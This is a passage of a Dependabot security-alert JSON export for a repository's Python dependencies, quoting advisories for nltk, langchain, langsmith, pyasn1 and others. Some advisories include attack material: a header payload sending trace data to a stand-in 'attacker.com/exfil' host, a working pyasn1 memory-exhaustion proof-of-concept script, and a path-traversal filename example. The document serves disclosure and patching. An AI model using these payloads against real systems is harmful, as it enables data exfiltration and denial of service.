4.0.0","first_patched_version":{"identifier":"4.0.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00366,"percentile":0.5857},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 4.0.0","first_patched_version":{"identifier":"4.0.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/88","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/88","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":87,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-7p94-766c-hgjp","cve_id":"CVE-2025-14009","summary":"NLTK has a Zip Slip Vulnerability","description":"A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.","severity":"critical","identifiers":[{"value":"GHSA-7p94-766c-hgjp","type":"GHSA"},{"value":"CVE-2025-14009","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-14009"},{"url":"https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4"},{"url":"https://github.com/nltk/nltk/pull/3468"},{"url":"https://github.com/nltk/nltk/commit/1056b323af6462455571302e766b67cf300aea18"},{"url":"https://github.com/nltk/nltk/blob/4154eb85e832f266660a09286c7e37e308292284/ChangeLog#L1"},{"url":"https://github.com/advisories/GHSA-7p94-766c-hgjp"}],"published_at":"2026-02-18T18:30:40Z","updated_at":"2026-02-25T20:23:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 3.9.2","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00878,"percentile":0.75402},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cwes":[{"cwe_id":"CWE-94","name":"Improper Control of Generation of Code ('Code Injection')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 3.9.2","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/87","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/87","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":86,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2g6r-c272-w58r","cve_id":"CVE-2026-26013","summary":"LangChain affected by SSRF via image_url token counting in ChatOpenAI.get_num_tokens_from_messages","description":"## Server-Side Request Forgery (SSRF) in ChatOpenAI Image Token Counting\n\n### Summary\nThe `ChatOpenAI.get_num_tokens_from_messages()` method fetches arbitrary `image_url` values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.\n\n### Severity\n**Low** - The vulnerability allows SSRF attacks but has limited impact due to:\n- Responses are not returned to the attacker (blind SSRF)\n- Default 5-second timeout limits resource exhaustion\n- Non-image responses fail at PIL image parsing\n\n### Impact\nAn attacker who can control image URLs passed to `get_num_tokens_from_messages()` can:\n- Trigger HTTP requests from the application server to arbitrary internal or external URLs\n- Cause the server to access internal network resources (private IPs, cloud metadata endpoints)\n- Cause minor resource consumption through image downloads (bounded by timeout)\n\n**Note:** This vulnerability occurs during token counting, which may happen outside of model invocation (e.g., in logging, metrics, or token budgeting flows).\n\n### Details\nThe vulnerable code path:\n1. `get_num_tokens_from_messages()` processes messages containing `image_url` content blocks\n2. For images without `detail: \"low\"`, it calls `_url_to_size()` to fetch the image and compute token counts\n3. `_url_to_size()` performs `httpx.get(image_source)` on any URL without validation\n4. Prior to the patch, there was no SSRF protection, size limits, or explicit timeout\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py`\n\n### Patches\nThe vulnerability has been patched in `langchain-openai==1.1.9` (requires `langchain-core==1.2.11`).\n\nThe patch adds:\n1. **SSRF validation** using `langchain_core._security._ssrf_protection.validate_safe_url()` to block:\n - Private IP ranges (RFC 1918, loopback, link-local)\n - Cloud metadata endpoints (169.254.169.254, etc.)\n - Invalid URL schemes\n2. **Explicit size limits** (50 MB maximum, matching OpenAI's payload limit)\n3. **Explicit timeout** (5 seconds, same as `httpx.get` default)\n4. **Allow disabling image fetching** via `allow_fetching_images=False` parameter\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n1. **Sanitize input:** Validate and filter `image_url` values before passing messages to token counting or model invocation\n2. **Use network controls:** Implement egress filtering to prevent outbound requests to private IPs","severity":"low","identifiers":[{"value":"GHSA-2g6r-c272-w58r","type":"GHSA"},{"value":"CVE-2026-26013","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-2g6r-c272-w58r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26013"},{"url":"https://github.com/langchain-ai/langchain/commit/2b4b1dc29a833d4053deba4c2b77a3848c834565"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.11"},{"url":"https://github.com/advisories/GHSA-2g6r-c272-w58r"}],"published_at":"2026-02-11T14:23:13Z","updated_at":"2026-02-11T14:23:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 1.2.11","first_patched_version":{"identifier":"1.2.11"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0505},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 1.2.11","first_patched_version":{"identifier":"1.2.11"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/86","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/86","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":85,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-r6ph-v2qm-q3c2","cve_id":"CVE-2026-26007","summary":"cryptography Vulnerable to a Subgroup Attack Due to Missing Subgroup Validation for SECT Curves","description":"## Vulnerability Summary\n\nThe `public_key_from_numbers` (or `EllipticCurvePublicNumbers.public_key()`), `EllipticCurvePublicNumbers.public_key()`, `load_der_public_key()` and `load_pem_public_key()` functions do not verify that the point belongs to the expected prime-order subgroup of the curve.\n\nThis missing validation allows an attacker to provide a public key point `P` from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as `S = [victim_private_key]P` via ECDH, this leaks information about `victim_private_key mod (small_subgroup_order)`. For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup.\n\nOnly SECT curves are impacted by this.\n\n## Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine","severity":"high","identifiers":[{"value":"GHSA-r6ph-v2qm-q3c2","type":"GHSA"},{"value":"CVE-2026-26007","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"},{"url":"https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"},{"url":"https://github.com/pyca/cryptography/releases/tag/46.0.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26007"},{"url":"http://www.openwall.com/lists/oss-security/2026/02/10/4"},{"url":"https://github.com/advisories/GHSA-r6ph-v2qm-q3c2"}],"published_at":"2026-02-10T21:27:06Z","updated_at":"2026-02-13T08:47:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 46.0.4","first_patched_version":{"identifier":"46.0.5"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","score":8.2}},"epss":{"percentage":9.0e-05,"percentile":0.00867},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 46.0.4","first_patched_version":{"identifier":"46.0.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/85","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/85","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":84,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-v34v-rq6j-cj6p","cve_id":"CVE-2026-25528","summary":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","description":"## Summary\n\nThe LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n ```\n baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL\n\n3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith>=0.6.3`\n- **JavaScript:** `npm install langsmith@>=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic","severity":"medium","identifiers":[{"value":"GHSA-v34v-rq6j-cj6p","type":"GHSA"},{"value":"CVE-2026-25528","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25528"},{"url":"https://github.com/advisories/GHSA-v34v-rq6j-cj6p"}],"published_at":"2026-02-09T20:36:59Z","updated_at":"2026-02-09T22:39:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.3.41, < 0.4.6","first_patched_version":{"identifier":"0.4.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00014,"percentile":0.02521},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/84","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/84","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":83,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"protobuf"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-7gcm-g887-7qv7","cve_id":"CVE-2026-0994","summary":"protobuf affected by a JSON recursion depth bypass","description":"A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError.","severity":"high","identifiers":[{"value":"GHSA-7gcm-g887-7qv7","type":"GHSA"},{"value":"CVE-2026-0994","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0994"},{"url":"https://github.com/protocolbuffers/protobuf/pull/25239"},{"url":"https://github.com/protocolbuffers/protobuf/issues/25070"},{"url":"https://github.com/protocolbuffers/protobuf/commit/d2b001626d137c62dfee6c88c87324102531868b"},{"url":"https://github.com/protocolbuffers/protobuf/commit/5ebddcb1bcbe51d1fe323baa145e85f4f23128cf"},{"url":"https://github.com/advisories/GHSA-7gcm-g887-7qv7"}],"published_at":"2026-01-23T15:31:35Z","updated_at":"2026-02-05T15:47:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":">= 6.30.0rc1, <= 6.33.4","first_patched_version":{"identifier":"6.33.5"}},{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 5.29.6","first_patched_version":{"identifier":"5.29.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L","score":8.2}},"epss":{"percentage":0.00013,"percentile":0.02136},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 5.29.6","first_patched_version":{"identifier":"5.29.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/83","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/83","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":82,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-wp53-j4wj-2cfg","cve_id":"CVE-2026-24486","summary":"Python-Multipart has Arbitrary File Write via Non-Default Configuration","description":"### Summary\n\nA Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename.\n\n### Details\n\nWhen `UPLOAD_DIR` is set and `UPLOAD_KEEP_FILENAME` is `True`, the library constructs the file path using `os.path.join(file_dir, fname)`. Due to the behavior of `os.path.join()`, if the filename begins with a `/`, all preceding path components are discarded:\n\n```py\nos.path.join(\"/upload/dir\", \"/etc/malicious\") == \"/etc/malicious\"\n```\n \nThis allows an attacker to bypass the intended upload directory and write files to arbitrary paths. \n \n#### Affected Configuration \n \nProjects are only affected if all of the following are true: \n- `UPLOAD_DIR` is set\n- `UPLOAD_KEEP_FILENAME` is set to True\n- The uploaded file exceeds `MAX_MEMORY_FILE_SIZE` (triggering a flush to disk)\n\nThe default configuration is not vulnerable. \n \n#### Impact \n \nArbitrary file write to attacker-controlled paths on the filesystem. \n \n#### Mitigation \n \nUpgrade to version 0.0.22, or avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.","severity":"high","identifiers":[{"value":"GHSA-wp53-j4wj-2cfg","type":"GHSA"},{"value":"CVE-2026-24486","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg"},{"url":"https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24486"},{"url":"https://github.com/advisories/GHSA-wp53-j4wj-2cfg"}],"published_at":"2026-01-26T23:28:05Z","updated_at":"2026-01-29T03:24:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.22","first_patched_version":{"identifier":"0.0.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00958,"percentile":0.76549},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.22","first_patched_version":{"identifier":"0.0.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/82","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/82","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":81,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-63vm-454h-vhhq","cve_id":"CVE-2026-23490","summary":"pyasn1 has a DoS vulnerability in decoder","description":"### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n print(\"[*] Memory limit set to 100MB\")\nexcept:\n print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b'\\x81' * payload_size + b'\\x00'\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length < 128:\n length_bytes = bytes([length])\nelif length < 256:\n length_bytes = b'\\x81' + length.to_bytes(1, 'big')\nelif length < 256**2:\n length_bytes = b'\\x82' + length.to_bytes(2, 'big')\nelif length < 256**3:\n length_bytes = b'\\x83' + length.to_bytes(3, 'big')\nelse:\n # 4 bytes can handle up to 4GB\n length_bytes = b'\\x84' + length.to_bytes(4, 'big')\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b'\\x06' + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n print(\"[*] Decoding (this may take time or exhaust memory)...\")\n result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n print(f'[+] Decoded successfully')\n print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')\n\n # Try to convert to string\n print('[*] Converting to string...')\n try:\n str_result = str(result[0])\n print(f'[+] String succeeded: {len(str_result)} chars')\n if len(str_result) > 10000:\n print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')\n except MemoryError:\n print(f'[-] MemoryError during string conversion!')\n except Exception as e:\n print(f'[-] {type(e).__name__} during string conversion')\n\nexcept MemoryError:\n print('[-] MemoryError: Out of memory!')\nexcept Exception as e:\n print(f'[-] Error: {type(e).__name__}: {e}')\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### DoS\n![\"Screenshot_20251219_160840\"](\"https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f\")
\n\n![\"Screenshot_20251219_152815\"](\"https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa\")
\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..\n 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....\n 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... \n 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.\n\n[*] Digit distribution analysis:\n '0': 10.1%\n '1': 9.9%\n '2': 10.0%\n '3': 9.9%\n '4': 9.9%\n '5': 10.0%\n '6': 10.0%\n '7': 10.0%\n '8': 9.9%\n '9': 10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.","severity":"high","identifiers":[{"value":"GHSA-63vm-454h-vhhq","type":"GHSA"},{"value":"CVE-2026-23490","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq"},{"url":"https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6"},{"url":"https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23490"},{"url":"https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970"},{"url":"https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html"},{"url":"https://github.com/advisories/GHSA-63vm-454h-vhhq"}],"published_at":"2026-01-16T19:19:25Z","updated_at":"2026-02-01T18:30:16Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 0.6.1","first_patched_version":{"identifier":"0.6.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00021,"percentile":0.05578},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"= 0.6.1","first_patched_version":{"identifier":"0.6.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/81","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/81","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":80,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"virtualenv"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-597g-3phw-6986","cve_id":"CVE-2026-22702","summary":"virtualenv Has TOCTOU Vulnerabilities in Directory Creation","description":"## Impact\n\nTOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in `virtualenv` allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations.\n\n**Affected versions:** All versions up to and including 20.36.1\n\n**Affected users:** Any user running `virtualenv` on multi-user systems where untrusted local users have filesystem access to shared temporary directories or where `VIRTUALENV_OVERRIDE_APP_DATA` points to a user-writable location.\n\n**Attack scenarios:**\n- Cache poisoning: Attacker corrupts wheels or Python metadata in the cache\n- Information disclosure: Attacker reads sensitive cached data or metadata\n- Lock bypass: Attacker controls lock file semantics to cause concurrent access violations\n- Denial of service: Lock starvation preventing virtualenv operations\n\n## Patches\n\nThe vulnerability has been patched by replacing check-then-act patterns with atomic `os.makedirs(..., exist_ok=True)` operations.\n\n**Fixed in:** PR #3013\n\n**Versions with the fix:** 20.36.2 and later\n\nUsers should upgrade to version 20.36.2 or later.\n\n## Workarounds\n\nIf you cannot upgrade immediately:\n\n1. Ensure `VIRTUALENV_OVERRIDE_APP_DATA` points to a directory owned by the current user with restricted permissions (mode 0700)\n2. Avoid running `virtualenv` in shared temporary directories where other users have write access\n3. Use separate user accounts for different projects to isolate app_data directories\n\n## References\n\n- GitHub PR: https://github.com/pypa/virtualenv/pull/3013\n- Vulnerability reported by: @tsigouris007\n- 